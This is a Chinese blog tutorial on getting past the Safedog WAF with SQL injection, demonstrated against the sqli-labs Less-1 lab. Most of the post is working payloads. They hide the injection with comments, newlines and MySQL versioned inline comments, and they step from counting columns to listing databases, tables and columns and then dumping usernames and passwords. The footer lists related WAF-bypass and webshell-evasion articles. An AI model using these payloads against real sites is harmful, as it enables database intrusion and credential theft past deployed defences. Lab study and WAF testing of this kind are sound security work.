Bypass安全狗

最新推荐文章于 2023-01-12 16:07:17 发布
最新推荐文章于 2023-01-12 16:07:17 发布
阅读量600 收藏 1
点赞数 3
文章标签: php windows mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sun_k/article/details/120183714
版权

0x00 手工fuzz绕过安全狗

环境

安全狗最新ApacheV4.0版(Windows)
在这里插入图片描述
Sqli-lab-Less-1

Phpstudy集成环境:Apache2.4.39、Mysql5.5.29

在这里插入图片描述

Sqli-lab-Less-1中包含了联合查询、报错注入、布尔盲注、时间延时盲注等注入姿势,方便我们进行测试。

1、fuzz安全狗拦截策略

http://192.168.174.136/sqli-labs-master/sqli-labs-master/Less-1/?id=1'   报错且不拦截
http://192.168.174.136/sqli-labs-master/sqli--master/Less-1/?id=1' and '1'='1 --+   拦截
http://192.168.174.136/sqli-labs-master/sqli-labs-master/Less-1/?id=1' and  不拦截,所以判断and后接数字则触发规则

在这里插入图片描述
在这里插入图片描述

通过burp加载字典对其进行fuzz,发现/*/%0a*a*/未触发规则
该处采用换行加注释进行绕过,其中/**/为mysql注释符,将中间内容注释不执行

在这里插入图片描述
通过and ’1‘=‘1判断页面返回正常,并未触发安全狗
在这里插入图片描述
通过and ’1‘=‘2判断页面返回不同,确定为字符型注入
在这里插入图片描述

2、查询字段数

1'order/*/%0a*a*/by 3%23  不报错
1'order/*/%0a*a*/by 4%23  报错则判断当前字段为3

正常payload被拦截

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-ovvCaGZA-1631090852631)(编写tamper学习-过狗.assets/image-20210908095928241.png)]

使用上面payload即可绕过

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-Z31WKrmP-1631090852632)(编写tamper学习-过狗.assets/image-20210908095758501.png)]

3、联合查询

使用上面payload发现被安全狗拦截

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-KQUGFm6X-1631090852633)(编写tamper学习-过狗.assets/image-20210908100226083.png)]

多次尝试发现在其再次加入注释即可绕过

此处使用/*!88888www.safedog.dog*/即可绕过,在mysql中存在特性,/*!*/中的数字大于当前数据库版本号则不执行,反之则执行,这个特性常常用于过waf,另外注释中的数字常常为五位数。
最终payload为 :
-1'union/*/%0a*a*//*!88888www.safedog.dog*/ select 1,2,3/**/%23
显示位为Your Login name和Your Password

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-JtcE83yt-1631090852634)(编写tamper学习-过狗.assets/image-20210908101619776.png)]

4、查询当前库名

先利用以上payload进行测试

-1'union/*/%0a*a*//*!88888www.safedog.dog*/ select 1,2,database()/**/%23

多次测试发现拦截字段database()

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-oyngfEfW-1631090852635)(编写tamper学习-过狗.assets/image-20210908110617644.png)]

在database和()中间加入之前payload即可绕过

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-lQMoM5Rx-1631090852636)(编写tamper学习-过狗.assets/image-20210908144633628.png)]

最终的payload为

-1'union/*/%0a*a*//*!88888www.safedog.dog*/ select 1,2,database/*/%0a*a*/()%23

5、查询所有数据库名称

同样利用以上payload尝试发现安全狗对from和information_schema.schemata进行拦截,再次通过字典对其fuzz,首先对from进行fuzz,使其不触发规则即可

 from可以使用注释加换行可以绕过
 /*! --+/*123%0a%0a from
 对于information_schema.schemata,将其字段通过内联注释混淆即可
 最终语句为
-1' union/*/%0a*a*//*!88888www.safedog.dog*/select/**/1,2,(select/**//*!88888www.safedog.dog*/group_concat(schema_name) from/*!--+/*%0a information_schema./*!schemata*/)%23

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-MW65sh8v-1631090852637)(编写tamper学习-过狗.assets/image-20210908105314773.png)]

通过fuzz方式发现下列语句也可绕过

-1' union/*//--/*//*!--+/*%0aselect/*//--/*//*!--+/*%0a1,2,(select/*//--/*//*!--+/*%0agroup_concat(schema_name) from/*//--/*//*!--+/*%0a information_schema./*!schemata*/)%23
主要绕过字段为/*//--/*//*!--+/*%0a

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-yjmd8yjo-1631090852638)(编写tamper学习-过狗.assets/image-20210908110402546.png)]

6、获取表名

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-kqJmeG4y-1631090852639)(编写tamper学习-过狗.assets/image-20210908154221936.png)]

http://192.168.174.136/sqli-labs-master/sqli-labs-master/Less-1/?id=-1%27%20union/*/%0a*a*//*!88888www.safedog.dog*/%20select%201,2,(select%20group_concat(table_name)%20/*!%20--+/*123%0a%0afrom%20information_schema./*!tables*/ where table_schema='security')%23

7、获取字段名

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-A5zAiVSr-1631090852641)(编写tamper学习-过狗.assets/image-20210908155127598.png)]

    http://192.168.174.136/sqli-labs-master/sqli-labs-master/Less-1/?id=-1' union /*/%0a*a*//*!88888www.safedog.dog*/select /*/%0a*a*//*!88888www.safedog.dog*/1,2,group_concat(column_name)    from /*!--+/*%0ainformation_schema./*!columns*/ where table_name='users' --+

8、获取数据

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-xi3YLDYD-1631090852644)(编写tamper学习-过狗.assets/image-20210908160357758.png)]

http://192.168.174.136/sqli-labs-master/sqli-labs-master/Less-1/?id=-1' union /*/%0a*a*//*!88888www.safedog.dog*/ select 1,2, group_concat(concat_ws(0x7e,username, password))    from   security.users --+

参考文章:https://blog.csdn.net/weixin_54648419/article/details/117285917

Justsudo
关注
  • 3
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
绕过安全狗
weixin_45923850的博客
07-20 1098
1. 判断类型:?id=1正常,?id=1 and 0被拦截,经过变形and和后面值发现这个组合会被拦截,用非常规方式绕过,例?id=1 and -1=-2和?id=1 and -1=-1,虽然绕过了,但是页面没变化,所以可能是字符型,加单引号就正常,?id=1' and -1=-1 --+ 2. 判断列数:输入?id=1' order by 3 --+被拦截,用注释,?id=1' /*!23144 order==*/ /*!32443 by*/ 3 --+页面正常,绕狗成功 3.
解决安全狗安装后显示apache插件未安装,无法使用的问题。
最新发布
Wwwwwwhyyyy的博客
12-07 778
我在卸载了安全狗后,我的本机电脑就无法安装安全狗了,在安装界面显示了无法检测到apache坏境之后,就会自动关闭,但是打开了apache服务之后,连提示都不给,直接自动关闭,所以导致我又重新安装了一个win镜像。为了确保不会遇到像我一样的问题,还是使用文件夹自带的安全狗卸载。4.打开任务管理器,选择服务页面,然后右键apache,启动apache就行了。6.弹出安装程序,自动填写了服务名,直接点击确定,开始安装。5.右键下方的安全狗图标,点击未安装,进行安装。软件直接在安全狗的官网下载就行了。
突破安全狗
duan_qiao925的博客
06-05 805
实验准备 Sql注入原理:用户能控制输入并构造恶意参数(多为sql语句),Web应用执行的代码拼接了未加过滤的nei'rong。
安全狗安装出错
gRpc的博客
10-23 2351
Need system command 'killall' to install safedog for linux. Installation aborted!     yum install psmisc 安装完成后可通过sdui 进入      
安全狗入选Gartner云安全&安全运营中国市场供应商双名单
bocco的博客
03-16 3579
近期,国际权威咨询机构Gartner基于市场研究和对中国安全产品供应商的调查做了评估并发布《Toolkit:Vendor Identification for Cloud Security, Data Security, IAM and Security Operation in China》。
SQL注入Bypass安全狗4.0.pdf
04-08
SQL注入攻击绕过安全狗4.0 SQL注入攻击是常见的Web应用安全漏洞之一,攻击者可以通过操纵SQL语句来访问或修改数据库中的数据。安全狗4.0是一款Web应用防火墙,可以检测和防止SQL注入攻击。但是,攻击者可以使用各种...
bypasswaf:关于安全狗和云锁的自动化绕过脚本
03-20
旁通为避免非法用途而进行的学习2.0:增加优化了部分规则现在bypass云锁篡改及bypass安全狗篡改支持所有的注入类型了!更新了bypass安全狗任意文件上传的方法(适用于业务系统存在的任何文件上传碎片但服务器安装了...
WAF的正确bypass
10-20
- **WAF编写漏洞**:分析WAF的源代码或工作原理,找寻可能的漏洞,如安全狗中的`%00`截断问题。 ### **七、学习与实践** - 推荐阅读HTTP协议相关的书籍,深入理解协议细节,这对于绕过WAF至关重要。 - 培养编程...
SQL_BypassWaf.pdf
04-08
软件WAF包括安全狗、云锁、ModSecurity等;云WAF如阿里云、创宇盾等。软件类和云WAF因为易于部署和更新规则,是当前研究的重点。 【WAF绕过策略】绕过WAF主要依赖于对SQL语法的深入理解和创新应用。比如,使用等价...
Watch.Dogs.2.EAC.Bypass_ywgj_
10-02
"Watch.Dogs.2.EAC.Bypass_ywgj_" 提供的是一种方法,用于规避EAC的限制,允许玩家在《看门狗2》中使用wemod修改器。wemod是一款强大的游戏辅助工具,提供了对多种单机游戏的修改功能,包括但不限于无限生命、无限...
SQL注入绕过安全狗
blackguest07的博客
01-12 2353
SQL注入绕过安全狗,内容很详细,本文仅供学习,请勿做一些非法事情,出事与博主无关。
bypass 学习笔记之绕安全狗||bypass safedog
Summer's blog
05-13 3303
目录前言0x00 前期准备0x01 开始尝试绕开判断字段数联合查询爆数据Reference Resources 前言 走上安全这条路也有9个月了,虽然中途有两个月一直在准备其他的事情,但是安全这条路一直在坚持着。 学习安全这么久了,从一开始的脚本小子,我也一直想转变一下,改变自己的现状,但是因为种种事情,给耽误了这个计划。 因为接触最多漏洞应该是SQL注入吧,所以我第一想到就是bypass ...
ByPASS系列之安全狗
游魂的博客
12-07 923
绕过安全狗: 内联注释法:/*! */ 首先测试拦截关键字:and 1=1 被拦 内联注释测试:/*!10440and*/1=1 http://xxxx.com:8888/int.php?id=5 and 1=1 可以看到已经绕过了安全狗检测,/*!数字and*/1=1,内联注释中的数字是通过模糊测试出来的。 注意:/*!数字*/ 数字小于数据库版本关键字会执行,大于数据库的版本关键字不会执行...
BypassWAF安全狗以及手工注入大全
Grey的博客
03-24 2103
过狗姿势①HPP参数污染使用多个无用的值或者重复的值打到攻击效果②双文件上传1.txt1.php覆盖前个文件SQL手工注入大全都知道'报错是手工注入的一种方法,但是为什么要手工注入呢?因为让第一条数据报错,就可以执行第二条语句联合注入法查询表名查询列名正则匹配查询布尔值注入主要是and的问题‘1’=‘1’的话,会返回一个正常的页面如果user()=本地用户的时候,结果如下如下显示失败count用法...
Bypass学习
weixin_44508748的博客
09-10 2229
一、网站防护分类 - 源码防护: 使用过滤函数对恶意攻击进行过滤,绕过思路: ①大小写替换 ②变换提交方式:如get请求变post/cookie请求绕过 ③编码绕过:url编码、基于语句重叠、注释符等 - 软件WAF: 通过访问速度、指纹识别等特征进行拦截;常见软件WAF如安全狗、D盾、云锁、云盾等,软件WAF侧重拦截web漏洞。通过访问阈值的大小判断为CC攻击,进行IP封锁; - 硬件WAF: 主要防御流量和部分web攻击。常见硬件WAF如天融信、深信服等厂商的防火墙。硬件WAF基于TCP三次握手封锁真实
sql注入bypass
http://www.gov.cn/xinwen/2016-11/07/content_5129723.htm
03-06 354
bypass 安全狗
我的WafBypass之道(SQL注入篇)
weixin_34197488的博客
03-19 448
原帖地址:https://xianzhi.aliyun.com/forum/read/349.html 0x00 前言 去年到现在就一直有人希望我出一篇关于waf绕过的文章,我觉得这种老生常 谈的话题也没什么可写的。 很多人一遇到waf就发懵,不知如何是好,能搜到的各 种姿势也是然并卵。 但是积累姿势的过程也是迭代的,那么就有了此文,用来总 结一些学习和培养突破waf的思想。 可能总结的...
SQL注入 安全狗绕过
iO快到碗里来
09-24 372
0x00 前言 最近看了几篇关于安全狗 Bypass 的文章,绕过方式五花八门。在此以安全狗 apache4.0.30255 为例,简单做个总结。 0x01 相关知识 /* … */ 在大部分语言中都是一种注释,处于 /* … */ 之中的语句是不被执行的。但 MySQL 为了保证兼容性,比如要求从 mysqldump 导出的 SQL 语句能被其它数据库直接使用,它把一些特有的仅在 MySQL 上能执行的语句放在 /*! … */ 中,这样这些语句在其它数据库中就不会被当作执行语句,但在 MySQL
渗透测试基础 - bypass-绕过阻挡我们的WAF(下)
weixin_45488495的博客
06-06 841
渗透测试基础 - bypass-绕过阻挡我们的WAF(下)简介 只为对所学知识做一个简单的梳理,如果有表达存在问题的地方,麻烦帮忙指认出来。我们一起为了遇见更好的自己而努力????! 【请进行合法的渗透测试,有关内容只是用作个人复习。】 简介 上次介绍了如何绕过安全狗的测试语句检测,这次将介绍,在得到webshell权限后,如何让自己的木马文件不会被发现并删除。已webshell查杀来说,安全狗确实差了点意思,稍微对语句做一点变动,安全狗就不能正常的识别,所以这里会在多加入两个webshell检测工具,进行
绕过SQL注入安全狗4.0的实战挑战
SQL注入Bypass安全狗4.0是一个关注点在于防范SQL注入攻击的安全防护软件,本文档似乎是在探讨如何通过实际操作来测试或绕过这种安全工具。在给出的源代码片段中,我们可以看到一个PHP应用程序,该程序试图验证用户...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值